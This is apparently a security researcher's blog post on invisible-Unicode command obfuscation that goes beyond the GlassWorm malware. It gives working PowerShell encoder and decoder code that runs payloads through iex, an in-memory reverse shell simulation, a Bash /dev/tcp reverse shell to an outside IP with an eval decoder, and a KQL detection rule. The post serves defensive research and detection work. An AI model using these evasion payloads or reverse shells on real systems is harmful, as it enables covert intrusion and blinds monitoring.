Reading time: 8 minutes

Invisible Unicode Obfuscation: Beyond GlassWorm

Table of Contents

Introduction

While analyzing several malware samples, I recently observed the use of mock directories (folders crafted to closely resemble default Windows directories but containing embedded spaces) to mislead analysts. A documented example of this technique can be found here: https://security.googlecloudcommunity.com/community-blog-42/finding-malware-dirtybulk-and-friends-usb-infections-to-fuel-cybercriminal-coinmining-operations-5552

“0.png”

Mock directories abusing embedded spaces to visually mimic legitimate Windows folders

Shortly after, John Hammond released a video on GlassWorm
(https://www.youtube.com/watch?v=0XumkGQFEEk), a malware that infects VS Code extensions by embedding obfuscated payloads made of invisible Unicode characters directly into the source code. These characters are visually similar to whitespace, making the malicious logic extremely hard to notice.

“1.png”

GlassWorm payload hidden inside a source code file using invisible Unicode characters. Source: https://www.koi.ai/blog/glassworm-first-self-propagating-worm-using-invisible-code-hits-openvsx-marketplace

This heavy reliance on whitespace-like characters sparked my curiosity. I wanted to understand how this technique works in practice, how it can be detected, and whether it could be applied in contexts beyond source code files. In many XDR products I use daily, file content inspection is limited or unavailable, which makes detecting this class of payload particularly challenging.

This led me to a broader question: can invisible Unicode obfuscation be abused in other execution contexts, such as command lines (PowerShell, Linux shells, etc.), to achieve Defense Evasion via Obfuscation (MITRE ATT&CK T1027.010 – Obfuscated Files or Information: Command Obfuscation)?

Since I found very little public material on this topic, I decided to conduct my own research.

The analysis was conducted through the following steps:

Research

The first step was collecting information on Unicode characters that are rendered as invisible or near-invisible. I quickly realized that the set is far larger than the one documented in GlassWorm analysis.

To understand their behavior in real telemetry, I printed these characters using a simple PowerShell script on a host monitored by Windows Defender. I then inspected how they appeared in Defender logs. Below are screenshots of the script and the resulting events. It is immediately evident that:

“2.png”

PowerShell script printing invisible and near-invisible Unicode characters for telemetry analysis

“3.png”

Windows Defender logs showing mixed rendering of invisible Unicode characters

Using Defender logs, I extracted all characters that appeared fully invisible and used them to build a proof of concept capable of obfuscating a payload.

Encoding logic

The encoder follows this logic:

The malicious code responsible for deobfuscation performs the inverse operation. Once the payload is reconstructed, it is executed using a cmdlet such as Invoke-Expression (IEX).

Below is the encoder using the characters \uFEFF and \u0020:

“4.png”

Unicode encoder transforming a clear-text payload into invisible characters

And here is the POC that decodes and executes the payload:

“5.png”

PowerShell decoder reconstructing and executing the invisible Unicode payload

The result was interesting: no alert was triggered, and the Defender event appeared empty. The only visual clue was an unusually small horizontal scrollbar in the browser, indicating a very long command line. Scrolling far to the right reveals the PowerShell decoder logic, which seems to operate on an empty variable.

In reality, although the characters are invisible, they are composed of different bytes. This makes it possible to store information covertly. Additionally, if the analyst’s text editor does not fully support the Unicode characters used, copy-paste operations may corrupt the payload by replacing or normalizing characters, making analysis impossible. In such cases, the safest approach is to download the raw log and inspect it using a hex editor or a Unicode-aware text editor.

“6.png”

Defender event appearing empty despite containing a long invisible command line

Apparently, an alternative variant consists of invoking powershell.exe from within an existing PowerShell session and passing the payload via -Args using a ScriptBlock. In this scenario, the PowerShell host may repackage the invocation for the spawned process using -EncodedCommand and -EncodedArguments, with arguments being internally serialized as XML before Base64 encoding. This approach can be particularly effective when an attacker has interactive access to the host, such as via RDP or direct console access.

“7.png”

Decoder variant using ScriptBlock in an existing Powershell session to make the command automatically Base64 encoded

“8.png”

Automatically generated -EncodedCommand and -EncodedArguments after process spawning

Even in this scenario, attempts to parse the command line reveal valid but apparently empty XML, potentially misleading analysts into assuming the event is benign or irrelevant.

“9.png”

Seemingly empty but valid XML generated from serialized invisible Unicode arguments

POC

Below is the POC code.

ENCODER:

$PAYLOAD = "Write-host paddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpaddingpadding malicious_command" 
$UNICODE1 = [char]0xFEFF
$UNICODE2 = [char]0x0020
$encoded = New-Object System.Text.StringBuilder
foreach ($ch in $PAYLOAD.ToCharArray()) {
	$bin = [Convert]::ToString([int][char]$ch, 2).PadLeft(8,'0')
	foreach ($b in $bin.ToCharArray()) {
		[void]$encoded.Append($(if ($b -eq '0') { $UNICODE1 } else { $UNICODE2 }))
	}
}
$encoded = $encoded.ToString()
$encoded

DECODERS:

powershell.exe -NoProfile -NoLogo -Command ('$e='''+($encoded -replace '''','''''')+''';$d=-join([regex]::Matches((-join($e.ToCharArray()|%{[int]([int]0x0020-eq[int]$_)})),''.{8}'')|%{[char][convert]::ToInt32($_.Value,2)});iex $d')
powershell.exe -NoProfile -NoLogo -Command {param($e)$d=-join([regex]::Matches((-join($e.ToCharArray()|%{[int](0x0020-eq[int]$_)})),'.{8}')|%{[char][convert]::ToInt32($_.Value,2)});iex $d} -Args $encoded

Simulation

Windows

After completing the POC, I attempted to simulate a very simple real-world attack using a reverse shell.

As a first step, I wrote a minimal reverse shell in C# and compiled it using csc.exe. I then exposed the compiled binary through a local HTTP server running on my machine.

“11.png”

Minimal C# reverse shell compiled and locally hosted for the simulation

Next, I created an online JavaScript tool for encoding and decoding invisible Unicode payloads. The tool is available at this page on my website.

Using this tool, I encoded a simple PowerShell script that downloads the executable via Invoke-WebRequest (iwr), reads its content and loads it directly into memory. This approach avoids spawning additional child processes, resulting in a stealthier process tree. The PowerShell command was then Base64-encoded and executed using PowerShell -EncodedCommand (-enc) option from a BAT file acting as a launcher.

“12.png”

PowerShell downloader obfuscated via the online Invisible Unicode Obfuscator tool

The resulting process tree looks like this:

flowchart LR
	a["`CMD
(*BAT file*)`"]
	b["`Powershell
(*encoded command*)`"]
	c["`Powershell
(*invisible command*)`"]
	d["`Reverse Shell
(*in memory*)`"]
a-->b
b-->c
c-->d

As shown below, the reverse shell is successfully triggered. Once again, the last relevant command line contains the payload encoded with invisible Unicode characters. Since the reverse shell is loaded entirely in memory, no additional child process is spawned. From a command-line and process-tree perspective, nothing appears to happen after this event, making the activity particularly difficult to detect without deep inspection of the command line itself. You can check this with Sysinternals Process Explorer.

“13.png”

Reverse shell execution with no visible command-line activity after payload decoding

Linux

I performed a similar test on Linux to verify whether the same technique could be applied outside the Windows ecosystem.

In this case, I used a very simple reverse shell implemented exclusively with Bash built-in features, avoiding the execution of child processes that might expose the real command or output. The payload is shown below:

exec 5<>/dev/tcp/82.85.145.134/80;cat <&5 | while read line; do $line 2>&5 >&5; done

This reverse shell was encoded using the same tool described earlier, available on my website and executed with the following command:

eval "$(echo -n '                                                 ' | perl -C -ne 'foreach(split//){print(ord($_)==0x0009?"1":"0")}' | perl -lpe '$_=pack("B*",$_)')"

As expected, no clear-text command line is displayed, and the reverse shell successfully establishes a connection:

“14.png”

Linux reverse shell executed using invisible Unicode characters in the command line

This behavior can be further confirmed using pspy, which shows no meaningful command-line activity despite the active reverse shell:

“15.png”

pspy showing no meaningful command lines

Detection

The following detection rule identifies the use of invisible Unicode characters identified during the activity. It detects obfuscated payloads of 512 characters (corresponding to 64 characters in the original payload). Multiple false positives were observed, such as Bash scripts containing large numbers of spaces, newlines, or sequences like “tab, tab and multiple spaces”. To reduce these false positives, the query verifies whether the most frequent character accounts for more than 95% of the matched string.

let chars = @"([\u0009\u000A\u000D\u001B\u0020\u00A0\u00AD\u034F\u061C\u115F\u1160\u1680\u180E\u2000-\u200F\u2028\u2029\u202A-\u202E\u202F\u205F\u2060-\u206F\u2800\u3000\u3164\uFE00-\uFE0F\uFEFF\uFFA0\x{1D173}-\x{1D17A}\x{E0001}\x{E0020}-\x{E007F}\x{E0100}-\x{E01EF}]{512,})";
DeviceProcessEvents
| where TimeGenerated > ago(30d)
| where isnotempty(ProcessCommandLine)
| where ProcessCommandLine matches regex chars
| mv-apply seq = extract_all(chars, ProcessCommandLine) on (    // For each event, extract all matches
	extend s = tostring(seq)
	| mv-expand cp = unicode_codepoints_from_string(s)                 // Expand the sequence into individual Unicode (one row per char)
	| summarize c = count() by cp = toint(cp)                                       // Count how many times each codepoint appears in the sequence
	| summarize SameRatio = todouble(max(c)) / todouble(sum(c)) // Compute ratio: (max frequency of a single char) / (total length of the sequence)
)
// Keep only events where the sequence is not "almost all the same char"
// (here: character with max frequency < 95% of the sequence)
| where SameRatio < 0.95
| project-away SameRatio
| distinct TimeGenerated, AccountName, ProcessCommandLine

“10.png”

Detection rule successfully identifying invisible Unicode obfuscation in command lines

Additional detection tips:

References